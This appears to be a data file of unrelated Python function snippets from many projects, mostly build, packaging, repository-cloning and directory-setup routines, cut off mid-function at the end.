"def build_for_dir(cls, dir_path):\n return cls(etau.parse_dir_pattern(dir_path)[0])",
"def build_code(self):\n if not path.isfile(path.join(self.tmpdir, 'requirements.txt')):\n return\n\n oldpwd = os.getcwd()\n os.chdir(self.tmpdir)\n\n call('pip install --requirement requirements.txt --target .'.split(' '))\n\n # We need to create a __init__.py per code directory without it.\n # This is required to not create a PYTHONPATH with all directories.\n #\n for (current_dir, directories, files) in os.walk('.', topdown=False):\n if current_dir.endswith('.dist-info'):\n # This is a python metadirectory, we can skip it\n continue\n namespacer = path.join(current_dir, '__init__.py')\n if not path.isfile(namespacer):\n print(\"Creating file {0}\".format(namespacer))\n with open(namespacer, 'w') as nmf:\n nmf.write('# File Generated by lambdamanager packager')\n\n os.chdir(oldpwd)",
"def build(self, conanfile):\n app = ConanApp(self._conan_api.cache_folder)\n conanfile.folders.set_base_package(conanfile.folders.base_build)\n conanfile.folders.set_base_pkg_metadata(os.path.join(conanfile.build_folder, \"metadata\"))\n run_build_method(conanfile, app.hook_manager)",
"def _create_builder(self, tmp_dir):\n return cifuzz.InternalGithubBuilder(self.PROJECT_NAME,\n self.PROJECT_REPO_NAME, tmp_dir,\n self.SANITIZER, self.COMMIT_SHA,\n self.PR_REF)",
"def build(path=None, output=None):\n conf.load(path)\n cache = Cache()\n if cache.processing_errors():\n for file_name, error in cache.processing_errors():\n message = \"error processing source file '%s' - %s\"\n logger.error(message % (file_name, error))\n if output:\n conf.set('build_path', output)\n logger.info('build directory: ' + conf.get('build_path'))\n for builder in builders.order():\n builder(cache)",
"def make(source, dependentOn, builder, buildNew=False, *builderParams):\n # check if pickle file exists\n if not os.path.exists(source):\n buildNew = True\n # check date\n # if source is newer\n if not buildNew and os.path.getmtime(source) > os.path.getmtime(dependentOn):\n print(\"load source: \", os.path.basename(source), \"...\", end=' ')\n target = load(open(source, 'rb'))\n else:\n print(\"build source: \", os.path.basename(source), \"...\", end=' ')\n target = builder(*builderParams)\n # pickle the target\n dump(target, open(source, 'wb'), 1)\n print(\"Done!\")\n return target",
"def fork(args):\n subprocess.check_call([\"git\", \"config\", \"--global\",\n \"--add\", \"safe.directory\", args.src])\n head = subprocess.check_output([\"git\", \"rev-parse\", args.rev], cwd=args.src).strip()\n obj_dir = subprocess.check_output([\"git\", \"rev-parse\", \"--git-path\", \"objects\"],\n cwd=args.src)\n obj_dir = os.path.join(args.src, obj_dir.decode())\n\n # Create an empty git repository. Native clone is too slow because the\n # typical gerrit source repo has a huge number of refs and git has to\n # inspect all of them. This approach lets us ignore all of that to only\n # use the rev we were asked to build.\n os.mkdir(\"/build/%s\" %(args.project))\n os.chdir(\"/build/%s\" %(args.project))\n subprocess.check_call([\"git\", \"init\", \"-q\"])\n\n # Setup alternates so we can see all the objects in the source repo\n with open(\".git/objects/info/alternates\", \"w\") as F:\n F.write(obj_dir)\n F.write(\"\\n\")\n\n # Create a branch using the only remote HEAD we care about\n subprocess.check_call([\"git\", \"checkout\", \"-q\", \"-b\", \"build\", \"--no-progress\", head])\n subprocess.check_call([\"git\", \"--no-pager\", \"log\", \"--oneline\", \"-n1\"])\n\n if args.project == \"kernel\":\n copy(\"%s/.config\" %(args.src), \"/build/%s\" %(args.project))\n\n args.src = \"/build/%s\" %(args.project)\n args.rev = head",
"def clone():\n require('PROJECT_NAME')\n require('PROJECT_REPO')\n require('MERCURIAL_BIN')\n\n # Create the \"apps\" directory if it does not exist.\n run('mkdir -p {}'.format(utils.home('apps')))\n\n if files.exists(utils.home('apps', env.PROJECT_NAME)):\n delete()\n\n with cd(utils.home('apps')):\n run('{0} clone {1} {2}'.format(env.MERCURIAL_BIN,\n env.PROJECT_REPO,\n env.PROJECT_NAME))",
"def pushd(cls, new_dir):\n previous_dir = os.getcwd()\n try:\n new_ab_dir = None\n if os.path.isabs(new_dir):\n new_ab_dir = new_dir\n else:\n new_ab_dir = os.path.join(previous_dir, new_dir)\n # Use absolute path to show it on FileNotFoundError message.\n cls.cd(new_ab_dir)\n yield\n finally:\n cls.cd(previous_dir)",
"def _do_action_bento_setup(self):\n self._exit_if_bento_still_running()\n\n cmd = \"rm -rf {bento_dir}; tar -zxvf {bento_tar}\".format(\n bento_dir=self.bento_home,\n bento_tar=self.bento_tgz)\n print(run(cmd))\n\n for command_suffix in [\"-env.sh\", \"\"]:\n\n kiji_env = os.path.join(self.bento_home, \"bin\", \"kiji\" + command_suffix)\n bento_env = os.path.join(self.bento_home, \"bin\", \"bento\" + command_suffix)\n if not os.path.isfile(kiji_env):\n assert os.path.isfile(bento_env)\n cmd = 'cp {bento_env} {kiji_env}'.format(\n bento_env=bento_env,\n kiji_env=kiji_env)\n run(cmd)\n\n cmd = \"cd {bento_dir}; source bin/kiji-env.sh; bento start\".format(\n bento_dir=self.bento_home,\n )\n print(run(cmd))\n assert os.path.isdir(self.bento_home)",
"def init_structure(self):\n dest = os.path.join(self.cwd, 'build', 'debian')\n self.mkdir_p(dest)\n struct = os.path.join(dest, self.cwd)\n self.mkdir_p(struct)\n# copytree_src = os.path.join(self.cwd, 'DEBIAN')\n# self.copytree(copytree_src, dest, symlinks=False, ignore=None)\n\n new_dest = os.path.join(dest, self.cwd[1:])\n self.copytree(\n self.cwd,\n new_dest,\n symlinks=False,\n ignore=self.ignore\n )",
"def build(self):\n self.puts(colored.blue(\"Building project...\"))\n\n if os.path.exists(self.build_path):\n shutil.rmtree(self.build_path)\n os.makedirs(self.build_path)\n\n with indent(2):\n self._reset_build_sequence_id()\n self._build_pre_project_template()\n self._build_project_template()\n self._build_pre_resources_template()\n self._build_resources_template()\n self._build_post_resources_template()",
"def build(self) -> None:",
"def build(session: nox.Session) -> None:\n\n dist_dir = DIR.joinpath(\"dist\")\n if dist_dir.exists():\n shutil.rmtree(dist_dir)\n\n session.install(\".[dev]\")\n session.run(\"flit\", \"build\")",
"def build_in_dir(self, build_dir: str):\n # Only build this task if it hasn't already been built\n if True: # not os.path.exists(FRONTEND_BUILD_DIR):\n self.rebuild_core()\n\n # Copy the built core and the given task file to the target path\n bundle_js_file = os.path.join(self.FRONTEND_BUILD_DIR, \"bundle.js\")\n target_resource_dir = os.path.join(build_dir, \"static\")\n target_path = os.path.join(target_resource_dir, \"bundle.js\")\n shutil.copy2(bundle_js_file, target_path)\n\n copied_static_file = os.path.join(\n self.FRONTEND_SOURCE_DIR, \"src\", \"static\", \"index.html\"\n )\n target_path = os.path.join(target_resource_dir, \"index.html\")\n shutil.copy2(copied_static_file, target_path)\n\n # Write a built file confirmation\n with open(os.path.join(build_dir, self.BUILT_FILE), \"w+\") as built_file:\n built_file.write(self.BUILT_MESSAGE)",
"def make_instance(target):\n if os.sep in target:\n raise IOError('%s not allowed in target' % os.sep)\n\n # these will OSError if the dirs exist\n os.mkdir(target)\n os.mkdir(os.path.join(target, 'assets'))\n\n shutil.copyfile(STUB_HTML, os.path.join(target, 'index.html'))",
"def cmd_create(self):\n self.repo.create()\n\n # Add .gitignore.\n self.repo.add_files({'.gitignore': '.swp\\n'}, FIRST_COMMIT_MSG)\n\n # Create the etc and timestamps branches.\n self.repo.checkout('etc', create=True)\n self.repo.checkout('timestamps', create=True)\n\n self.repo.checkout('master')\n self.repo.init()\n self.update_repository()\n print('Git repository created at %s' % self.repodir)",
"def butterfly(self):\n\n self.log.info(\"Begin Butterfly\")\n\n dst = os.path.join(self.cfg['start_dir'], 'Butterfly', 'src')\n try:\n os.chdir(dst)\n except OSError, err:\n self.log.error(\"Butterfly: failed to change to dst dir %s\" % (dst, err))\n\n cmd = \"ant\"\n run_cmd(cmd)\n\n self.log.info(\"End Butterfly\")",
"def build(c, path=\"../..\", name=\"testapp\"):\n if not os.name in [\"nt\", \"posix\"]:\n print(\"Sorry. this only supports Posix (e.g. Linux, OSX) and Windows OS. \")\n sys.exit()\n\n path=os.path.normpath(path)\n print(\"Building : -n {} -p {} \".format(name, path))\n if os.path.exists(os.path.join(path, name)):\n print(\"sorry, path {} exists\".format(os.path.abspath(os.path.join(path, name))))\n r=input(\" .. type y or yes, to go ahead deleting the existing: {} ? : \".format(os.path.join(path,name)))\n if r in [\"y\", \"yes\"]:\n import shutil\n r=shutil.rmtree(os.path.join(path,name))\n print(40*\"-\")\n print(\" ..... deleted dir tree: {}\".format(os.path.join(path, name)))\n print(40*\"-\")\n build_all(c,name, path)\n else:\n print(40*\"-\")\n print(\" ok, exiting...\")\n print(40*\"-\")\n sys.exit()\n else:\n # start the build and check\n build_all(c,name, path)",
"def new(self, object_id, base_id=None):\n with tempfile.TemporaryDirectory(dir=self.store) as tmp:\n # the tree that is yielded will be added to the content store\n # on success as object_id\n\n tree = f\"{tmp}/tree\"\n link = f\"{tmp}/link\"\n os.mkdir(tree, mode=0o755)\n\n if base_id:\n # the base, the working tree and the output tree are all on\n # the same fs, so attempt a lightweight copy if the fs\n # supports it\n subprocess.run([\"cp\", \"--reflink=auto\", \"-a\", f\"{self.refs}/{base_id}/.\", tree], check=True)\n\n yield tree\n\n # if the yield raises an exception, the working tree is cleaned\n # up by tempfile, otherwise, we save it in the correct place:\n fd = os.open(tree, os.O_DIRECTORY)\n try:\n m = hashlib.sha256()\n treesum.treesum(m, fd)\n treesum_hash = m.hexdigest()\n finally:\n os.close(fd)\n # the tree is stored in the objects directory using its content\n # hash as its name, ideally a given object_id (i.e., given config)\n # will always produce the same content hash, but that is not\n # guaranteed\n output_tree = f\"{self.objects}/{treesum_hash}\"\n\n # if a tree with the same treesum already exist, use that\n with suppress_oserror(errno.ENOTEMPTY):\n os.rename(tree, output_tree)\n\n # symlink the object_id (config hash) in the refs directory to the\n # treesum (content hash) in the objects directory. If a symlink by\n # that name alreday exists, atomically replace it, but leave the\n # backing object in place (it may be in use).\n os.symlink(f\"../objects/{treesum_hash}\", link)\n os.replace(link, f\"{self.refs}/{object_id}\")",
"def create(\n location: str,\n outputdir: pathlib.Path,\n *,\n extrabindings: Sequence[Binding],\n interactive: bool,\n revision: Optional[str],\n directory: Optional[pathlib.Path],\n in_place: bool,\n) -> None:\n config = ProjectConfig(location, (), revision, directory)\n\n with createproject(\n config, userbindings=extrabindings, interactive=interactive\n ) as project:\n projectdir = outputdir if in_place else outputdir / project.name\n repository = ProjectRepository.create(projectdir, message=\"Initial commit\")\n commit = commitproject(repository, project, commitmessage=createcommitmessage)\n\n repository.import_(commit)",
"def build(ctx):\n ctx.run(\"vsce package\", replace_env=False)",
"def _walk_dir(self, rootpath):\n assert os.path.isabs(rootpath)\n assert rootpath not in self._dirs\n relpath = self._get_rel_path(rootpath)\n self._dirs[relpath] = Directory(rootpath, relpath, None)\n for dirpath, dirnames, filenames in os.walk(rootpath):\n if 'refdata' in dirnames:\n dirnames.remove('refdata')\n currentdir = self._dirs[self._get_rel_path(dirpath)]\n # Loop through a copy so that we can modify dirnames.\n for dirname in list(dirnames):\n fullpath = os.path.join(dirpath, dirname)\n if fullpath == self._build_root:\n dirnames.remove(dirname)\n continue\n relpath = self._get_rel_path(fullpath)\n self._dirs[relpath] = Directory(fullpath, relpath, currentdir)\n extensions = ('.h', '.cuh', '.hpp', '.c', '.cc', '.cpp', '.cu', '.bm')\n for filename in filenames:\n basename, extension = os.path.splitext(filename)\n if extension in extensions:\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n self._files[relpath] = File(fullpath, relpath, currentdir)\n elif extension == '.cmakein':\n extension = os.path.splitext(basename)[1]\n if extension in extensions:\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n sourcefile = GeneratorSourceFile(fullpath, relpath, currentdir)\n self._files[relpath] = sourcefile\n fullpath = os.path.join(dirpath, basename)\n relpath = self._get_rel_path(fullpath)\n fullpath = os.path.join(self._build_root, relpath)\n generatedfile = GeneratedFile(fullpath, relpath, currentdir)\n self._files[relpath] = generatedfile\n generatedfile.set_generator_source(sourcefile)\n elif extension in ('.l', '.y', '.pre'):\n fullpath = os.path.join(dirpath, filename)\n relpath = self._get_rel_path(fullpath)\n self._files[relpath] = GeneratorSourceFile(fullpath, relpath, currentdir)",
"def build(c):",
"def build(self):\n pass",
"def build(self):\n pass",
"def pack():\n clean_local()\n build()\n copy_json()\n optimize()\n tarball()",
"def build_in_dir(self, build_dir: str):\n target_resource_dir = os.path.join(build_dir, \"static\")\n\n # If any additional task files are required via a source_dir, copy those as well\n extra_dir_path = self.args.blueprint.get(\"extra_source_dir\", None)\n if extra_dir_path is not None:\n extra_dir_path = os.path.expanduser(extra_dir_path)\n copy_tree(extra_dir_path, target_resource_dir)\n\n # Copy the built core and the given task file to the target path\n use_bundle = os.path.expanduser(self.args.blueprint.task_source)\n target_path = os.path.join(target_resource_dir, \"bundle.js\")\n\n should_link_task_source = self.args.blueprint.get(\"link_task_source\", False)\n if should_link_task_source:\n os.symlink(use_bundle, target_path)\n else:\n shutil.copy2(use_bundle, target_path)\n\n # Write a built file confirmation\n with open(os.path.join(build_dir, self.BUILT_FILE), \"w+\") as built_file:\n built_file.write(self.BUILT_MESSAGE)",
"def makeRepository(self, root):\n _gitInit(root)\n return root",
"def bowtie_build_cmd(fasta,ebwt_basename):\n build_index_cmd = Command(\"bowtie-build\",\n \"-f\",fasta,\n ebwt_basename)\n return build_index_cmd",
"def clone(args):\n osf = _setup_osf(args)\n project = osf.project(args.project)\n output_dir = args.project\n if args.output is not None:\n output_dir = args.output\n\n with tqdm(unit='files') as pbar:\n for store in project.storages:\n prefix = os.path.join(output_dir, store.name)\n\n for file_ in store.files:\n path = file_.path\n if path.startswith('/'):\n path = path[1:]\n\n path = os.path.join(prefix, path)\n if os.path.exists(path) and args.update:\n if checksum(path) == file_.hashes.get('md5'):\n continue\n directory, _ = os.path.split(path)\n makedirs(directory, exist_ok=True)\n\n with open(path, \"wb\") as f:\n file_.write_to(f)\n\n pbar.update()",
"def build(self):\n if os.path.exists(self.build_path) and not os.path.isdir(self.build_path):\n self._logger.error('Output path must be a folder if it already exists')\n return\n Compiler._mkdir(self.build_path)\n self._execute_backend_on_spec()",
"def make(config):\n # Create child folders\n for func in (create_basic_structure,\n copy_resources,\n copy_databases,\n copy_libraries,\n copy_security,\n copy_app_actions,\n copy_pages,\n create_application_info_file,\n replace_all_guids):\n\n INFO(\"\")\n INFO(\"+\"*70)\n INFO(\"\")\n func(config)",
"def ComponentVSDirProjectBuilder(target, source, env):\n source = source # Silence gpylint\n\n target_name = env['PROJECT_NAME']\n project_file = target[0].path\n project_dir = target[0].dir\n\n # Convert source folders to absolute paths\n folders = []\n for f in env['COMPONENT_VS_SOURCE_FOLDERS']:\n # (folder name, folder abspath, dict of contents)\n folders.append((f[0], env.Dir(f[1]).abspath, {}))\n\n # Recursively scan source directories\n print ' Scanning directories for source...'\n all_srcs = set()\n FindSources(env, all_srcs, env['PROJECT_SOURCES'],\n suffixes=env.SubstList2('$COMPONENT_VS_SOURCE_SUFFIXES'))\n\n # Walk all sources and build directory trees\n print ' Building source tree...'\n for n in all_srcs:\n # Map addRepository'd source to its real location.\n path = n.rfile().abspath\n for f in folders:\n if path.startswith(f[1]):\n if f[0] is None:\n # Folder name of None is a filter\n break\n relpath = path[len(f[1]) + 1:].split(os.sep)\n folder_dict = f[2]\n # Recursively add subdirs\n for pathseg in relpath[:-1]:\n if pathseg not in folder_dict:\n folder_dict[pathseg] = {}\n folder_dict = folder_dict[pathseg]\n # Add file to last subdir. No dict, since this isn't a subdir\n folder_dict[env.RelativePath(project_dir, path)] = None\n break\n\n print ' Writing project file...'\n\n vsp = VSProjectWriter(project_file)\n vsp.Create(target_name)\n\n # One configuration for all build modes\n vsp.AddConfig('all', {}, {})\n\n # Add files\n for f in folders:\n if f[0] is None:\n continue # Skip filters\n vsp.AddFiles(f[0], f[2])\n\n vsp.Write()\n return 0",
"def _build(self):",
"def _build(self):",
"def do_stage(self, mirror_only=False):\n super().do_stage(mirror_only)\n stsrc = self.stage.source_path\n srcpath = os.path.join( stsrc, self.build_directory )\n ppath = ancestor (srcpath)\n shutil.move(stsrc, stsrc+\"_old\")\n mkdirp(ppath)\n shutil.move(stsrc+\"_old\",srcpath)",
"def svn_fs_make_dir(*args):\r\n return _fs.svn_fs_make_dir(*args)",
"def build(working_directory, configuration):\n\n # Copy README.rst to docs/temp/README.html\n # Doxygen may not create the output folder, ensure it exists.\n\n temp_dir = os.path.join(working_directory, \"temp\")\n create_folder_if_needed(temp_dir)\n\n # Needed for dot generated docs\n create_folder_if_needed(os.path.join(temp_dir, \"images\"))\n\n # Process all the .dot files\n for item in os.listdir(working_directory):\n\n # Process the .dot files\n if _DOT_MATCH.match(item):\n # Call dot to create the files\n run_command(\n (\"dot\", \"-Tpng\", item, \"-otemp{0}images{0}{1}.png\".format(\n os.sep, item[:-4])),\n working_dir=working_directory)\n\n\n # Get the input and output file names\n source = os.path.join(os.path.dirname(working_directory), \"README.rst\")\n dest = os.path.join(temp_dir, \"README.html\")\n\n # Was the file already created and newer than the source?\n if is_source_newer(source, dest):\n\n # Load pandoc if needed to do the conversion\n pypandoc.ensure_pandoc_installed(delete_installer=True)\n pypandoc.convert_file(source, to=\"html\", outputfile=dest)\n return 0",
"def build(args):\n\n logging.info(\"Parsing configuration...\")\n try:\n config = {\"site\": configurator.get_config(os.path.join(args.src, args.configfile))}\n except Exception as exc:\n sys.exit(\"Error during configuration: \" + str(exc))\n\n if (args.autobaseurl):\n config[\"site\"][\"baseurl\"] = os.path.abspath(args.dest)\n\n logging.info(\"Loading and pre-processing content...\")\n if (os.path.isdir(os.path.join(args.src, paths.POSTS_PATH))):\n try:\n config[\"posts\"] = loader.get_from_folder(os.path.join(args.src, paths.POSTS_PATH), config)\n except ValueError as exc:\n sys.exit(\"Error loading posts: \" + str(exc))\n else:\n config[\"posts\"] = {}\n\n if (os.path.isdir(os.path.join(args.src, paths.PAGES_PATH))):\n try:\n config[\"pages\"] = loader.get_from_folder(os.path.join(args.src, paths.PAGES_PATH), config)\n except ValueError as exc:\n sys.exit(\"Error loading pages: \" + str(exc))\n else:\n config[\"pages\"] = {}\n\n logging.debug(\"Configuring Jinja2 environment...\")\n jinjaEnv = configurator.configure_jinja(config[\"site\"][\"theme\"], args.src)\n\n logging.debug(\"Initializing builder...\")\n Builder(jinjaEnv, config, args.src, args.dest, args.noclean).build()",
"def build(ctx: typer.Context):\n from .tasks import build, main\n\n sys.argv = sys.argv[:1] + (ctx.args or [\"list\"])\n main(vars(build))",
"def cli(ctx, repo_home):\n # Create a repo object and remember it as as the context object.\n ctx.obj = Repo(os.path.abspath(repo_home))",
"def test_new(tmpdir):\n chdir(tmpdir)\n subprocess.run(['leanproject', 'new'])\n assert (tmpdir/'leanpkg.path').exists()\n assert (tmpdir/'_target'/'deps'/'mathlib'/'src'/'algebra'/'free.olean').exists()",
"def chain_new(ctx, chain_name):\n project = ctx.obj['PROJECT']\n new_local_chain(project.project_dir, chain_name)",
"def lemon_bidscoin_prepare(src_path):\n lemon_prepare()\n this_dir = os.path.dirname(__file__)\n data_dir = os.path.join(this_dir,'..','_data')\n root_path = os.path.abspath(os.path.join(data_dir,'lemon'))\n bidscoin_input_path = src_path\n\n os.makedirs(bidscoin_input_path,exist_ok=True)\n\n files = _get_files(root_path)\n files = [x for x in files if x.split('.')[-1] in ['eeg','vmrk','vhdr'] ]\n\n files_out = []\n for f in files:\n session = 'ses-001'\n task = 'resting'\n head,tail=os.path.split(f)\n sub = tail.split('.')[0]\n new_path = os.path.join(bidscoin_input_path,sub,session,task,tail)\n files_out.append(new_path)\n\n for old,new in zip(files,files_out):\n print(old,' to ',new)\n os.makedirs(os.path.split(new)[0], exist_ok=True)\n if not os.path.isfile(new):\n shutil.copy2(old,new)\n else:\n print('already done, skipping...')\n print('finish')",
"def init_package(self):\n # create the package directory\n if os.path.exists(self.path):\n msg = 'path \"{}\" already existed, init aborted'.format(self.path)\n logger.error(msg)\n raise SystemExit(BASE_ESTRING + msg)\n os.makedirs(self.path)\n\n # create the src sub directory\n os.makedirs(os.path.join(self.path, 'src'))\n\n # get git config user.name\n default_author = self.git.spawn_with(\n lambda x: x.arg('config').arg('user.name')).strip()\n\n # create the Enzi.toml\n enzi_toml = os.path.join(self.path, 'Enzi.toml')\n f = io.FileIO(enzi_toml, 'w')\n writer = io.BufferedWriter(f)\n sio = EnziConfigValidator.base_file(self.name, default_author)\n file_content = sio.getvalue()\n writer.write(file_content.encode('utf-8'))\n writer.close()",
"def build():\n local('wintersmith build')",
"def _do_build ():\n if os.path.exists(\"./database\"):\n data_path = \"./database/\"\n elif os.path.exists(\"../database\"):\n data_path = \"../database/\"\n elif os.path.exists(\"../../database\"):\n data_path = \"../../database/\"\n else:\n data_path = \".\"\n\n dir_specs = {}\n databases = []\n\n # first pass over the databases to create complete tree:\n for dirpath, dirnames, filenames in os.walk(data_path):\n # all databases are stored\n for name in filenames:\n if name.endswith(\".db\"):\n databases.append(os.path.join(dirpath, name).replace(data_path, \"\"))\n # but we need to store specs here otherwise things could get a bit confusing\n elif name.endswith(\".spec\"):\n possible_dir = os.path.join(dirpath, name[:-5]+\".db\")\n if os.path.exists(possible_dir) and os.path.isdir(possible_dir):\n spec_name = possible_dir.replace(data_path, \"\")\n dir_specs[spec_name] = parse_spec(os.path.join(dirpath, name))\n\n # and we create DatabaseFolders for each subfolder\n for name in dirnames:\n if name.endswith(\".db\"):\n # dump the extension here too\n obj_name = name[:-3]\n this_folder = DatabaseFolder(obj_name)\n\n if dir_specs.has_key(name):\n this_folder.spec = dir_specs.pop(name)\n\n if dirpath != data_path:\n search = dirpath.replace(data_path, \"\").split(PATH_DELIM)\n try:\n top_folder = globals()[search[0]]\n except KeyError:\n raise DatabaseError, \"Subdirectory of a db folder without a DatabaseFolder?\"\n for p in search[1:]:\n if p == name:\n break\n try:\n top_folder = getattr(top_folder, p)\n except AttributeError:\n raise DatabaseError, \"Subdirectory of a db subfolder without a DatabaseFolder subfolder!\"\n top_folder.append(this_folder)\n else:\n globals()[obj_name] = this_folder\n\n for database in databases:\n build_from_file_name(database, data_path)",
"def import_bento_(bento_path: str) -> None: # type: ignore (not accessed)\n bento = import_bento(bento_path)\n logger.info(\"%s imported.\", bento)",
"def build_backbone(self):\n backbone = self.arch.backbone\n self.backbone = build_blocks(backbone, 'backbone')",
"def generate_build_file(startpath, outfilename='build.yml'):\n buildfiles = {}\n buildtables = {}\n\n def file_node(ext, fullpath):\n return fullpath\n\n def table_node(ext, fullpath):\n return [ext.lower(), fullpath]\n\n def add_to_contents(contents, nodefunc, path, files):\n try:\n safepath = [_pythonize_name(d) if d != '.' else '.' for d in path]\n except BuildException:\n warning = \"Warning: could not determine a Python-legal name for {path}; skipping.\"\n print(warning.format(path=os.sep.join(path)))\n return\n\n ptr = contents\n for folder in safepath:\n ptr = ptr.setdefault(folder, {})\n\n for file in files:\n fullpath = os.path.join(os.path.join(*path), file)\n name, ext = splitext_no_dot(file)\n ptr[_pythonize_name(name)] = nodefunc(ext, fullpath)\n\n for root, dirs, files in os.walk(startpath):\n # skip hidden directories\n for d in dirs:\n if d.startswith('.') or d == PACKAGE_DIR_NAME:\n dirs.remove(d)\n\n rel_path = os.path.relpath(root, startpath)\n path = rel_path.split(os.sep)\n\n tablefiles = []\n rawfiles = []\n for file in files:\n # skip hidden files\n if file.startswith('.'):\n continue\n\n name, ext = splitext_no_dot(file)\n # separate files into tables and raw\n if ext.lower() in TARGET['pandas']:\n tablefiles.append(file)\n else:\n rawfiles.append(file)\n\n if rawfiles:\n add_to_contents(buildfiles, file_node, path, rawfiles)\n\n if tablefiles:\n add_to_contents(buildtables, table_node, path, tablefiles)\n\n for contents in [buildfiles, buildtables]:\n for node in ['.', '..']:\n if node in contents:\n for key in contents[node]:\n contents[key] = contents[node][key]\n del contents[node]\n\n contents = dict(files=buildfiles, tables=buildtables)\n buildfilepath = os.path.join(startpath, outfilename)\n with open(buildfilepath, 'w') as outfile:\n yaml.dump(contents, outfile)\n return buildfilepath",
"def do(args):\n worktree = qisys.parsers.get_worktree(args)\n\n project_name = args.project_name\n project_path = os.path.join(os.getcwd(), project_name)\n\n if os.path.exists(project_path):\n raise Exception(\"%s already exists\" % project_path)\n os.mkdir(project_path)\n copy_helper(project_name, project_path)\n\n if args.git:\n qisys.command.call([\"git\", \"init\"], cwd=project_path)\n with open(os.path.join(project_path, \".gitignore\"), \"w\") as fp:\n fp.write(\"build-*\\n\")\n qisys.command.call([\"git\" , \"add\" , \".\"], cwd=project_path)\n qisys.command.call([\"git\" , \"commit\" , \"-m\" , \"initial commit\"], cwd=project_path)\n\n ui.info(ui.green, \"New project initialized in\", ui.bold, project_path)\n worktree.add_project(project_path)\n return worktree.get_project(project_path)",
"def build():\n local('vagrant up')",
"def __gitCreateArchive(self):\n self.vcs.gitCreateArchive(self.project.getProjectPath())",
"def build(which):\n return subprocess.Popen([p['paths']['w2l'],'obj',os.path.abspath(which)]).wait()",
"def dlimport_workdir(basedir):\r\n return tempfile.mkdtemp(dir=basedir)",
"def new(root: str = \".\", name: str = \"piccolo_project\"):\n tree = os.walk(TEMPLATE_DIR)\n\n router = get_routing_framework()\n\n template_context = {\n \"router\": router,\n \"router_dependencies\": ROUTER_DEPENDENCIES.get(router) or [router],\n \"server\": get_server(),\n \"project_identifier\": name.replace(\" \", \"_\").lower(),\n }\n\n for directory in tree:\n dir_path, sub_dir_names, file_names = directory # type: ignore\n\n output_dir_path = os.path.join(root, dir_path.split(TEMPLATE_DIR)[-1])\n\n if not os.path.exists(output_dir_path):\n folder_name = output_dir_path.split(\"/\")[-1]\n if folder_name.startswith((\"_\", \".\")):\n continue\n os.mkdir(dir_path)\n\n for sub_dir_name in sub_dir_names:\n if sub_dir_name.startswith(\"_\"):\n continue\n\n sub_dir_path = os.path.join(output_dir_path, sub_dir_name)\n if not os.path.exists(sub_dir_path):\n os.mkdir(sub_dir_path)\n\n for file_name in file_names:\n if file_name.startswith(\"_\") and file_name != \"__init__.py.jinja\":\n continue\n\n extension = file_name.rsplit(\".\")[0]\n if extension in (\"pyc\",):\n continue\n\n if file_name.endswith(\".jinja\"):\n output_file_name = file_name.replace(\".jinja\", \"\")\n template = Environment(\n loader=FileSystemLoader(searchpath=dir_path)\n ).get_template(file_name)\n\n output_contents = template.render(**template_context)\n\n if output_file_name.endswith(\".py\"):\n try:\n output_contents = black.format_str(\n output_contents,\n mode=black.FileMode(line_length=80),\n )\n except Exception as exception:\n print(f\"Problem processing {output_file_name}\")\n raise exception from exception\n\n with open(\n os.path.join(output_dir_path, output_file_name), \"w\"\n ) as f:\n f.write(output_contents)\n else:\n if file_name.endswith(\".jinja_raw\"):\n output_file_name = file_name.replace(\n \".jinja_raw\", \".jinja\"\n )\n else:\n output_file_name = file_name\n\n shutil.copy(\n os.path.join(dir_path, file_name),\n os.path.join(output_dir_path, output_file_name),\n )\n\n print(\n \"Run `pip install -r requirements.txt` and `python main.py` to get \"\n \"started.\"\n )",
"def init_git(self):\n self.git.spawn_with(lambda x: x.arg('init'))\n self.git.add_files('Enzi.toml')\n\n # add .gitignore\n gitignore = os.path.join(self.path, '.gitignore')\n with open(gitignore, 'w') as f:\n f.write('# ignore Enzi build directory\\n')\n f.write('build/\\n')\n self.git.add_files('.gitignore')",
"def cd_genny_root():\n script_path = os.path.abspath(__file__)\n script_dir = os.path.dirname(script_path)\n # cd into script directory first so we can get the project root with git.\n os.chdir(script_dir)\n root = get_project_root()\n os.chdir(root)",
"def generate(ctx, directory):\n ctx.ensure_object(dict)\n\n ctx.obj['scoped_context'] = {\n 'verbose': ctx.obj['verbose'],\n 'force': ctx.obj['force'],\n 'dry': ctx.obj['dry'],\n }\n\n ctx.obj['project_files'] = FileHandler.find_files(\n path=directory or os.getcwd(),\n patterns=['apps.py']\n )\n\n if not inside_app_directory(ctx, exit_on_error=not ctx.obj['force']):\n raise click.Abort",
"def generate(repo_dir, context, update):\n\n result = generate_files(\n repo_dir=repo_dir,\n context=context,\n overwrite_if_exists=update,\n skip_if_file_exists=not update,\n output_dir='.',\n )\n return result",
"def __init__(\n self,\n path: Optional[PathLike] = None,\n odbt: Type[LooseObjectDB] = GitCmdObjectDB,\n search_parent_directories: bool = False,\n expand_vars: bool = True,\n ) -> None:\n\n epath = path or os.getenv(\"GIT_DIR\")\n if not epath:\n epath = os.getcwd()\n if Git.is_cygwin():\n # Given how the tests are written, this seems more likely to catch\n # Cygwin git used from Windows than Windows git used from Cygwin.\n # Therefore changing to Cygwin-style paths is the relevant operation.\n epath = cygpath(epath)\n\n epath = epath or path or os.getcwd()\n if not isinstance(epath, str):\n epath = str(epath)\n if expand_vars and re.search(self.re_envvars, epath):\n warnings.warn(\n \"The use of environment variables in paths is deprecated\"\n + \"\\nfor security reasons and may be removed in the future!!\"\n )\n epath = expand_path(epath, expand_vars)\n if epath is not None:\n if not os.path.exists(epath):\n raise NoSuchPathError(epath)\n\n ## Walk up the path to find the `.git` dir.\n #\n curpath = epath\n git_dir = None\n while curpath:\n # ABOUT osp.NORMPATH\n # It's important to normalize the paths, as submodules will otherwise initialize their\n # repo instances with paths that depend on path-portions that will not exist after being\n # removed. It's just cleaner.\n if is_git_dir(curpath):\n git_dir = curpath\n # from man git-config : core.worktree\n # Set the path to the root of the working tree. If GIT_COMMON_DIR environment\n # variable is set, core.worktree is ignored and not used for determining the\n # root of working tree. This can be overridden by the GIT_WORK_TREE environment\n # variable. The value can be an absolute path or relative to the path to the .git\n # directory, which is either specified by GIT_DIR, or automatically discovered.\n # If GIT_DIR is specified but none of GIT_WORK_TREE and core.worktree is specified,\n # the current working directory is regarded as the top level of your working tree.\n self._working_tree_dir = os.path.dirname(git_dir)\n if os.environ.get(\"GIT_COMMON_DIR\") is None:\n gitconf = self._config_reader(\"repository\", git_dir)\n if 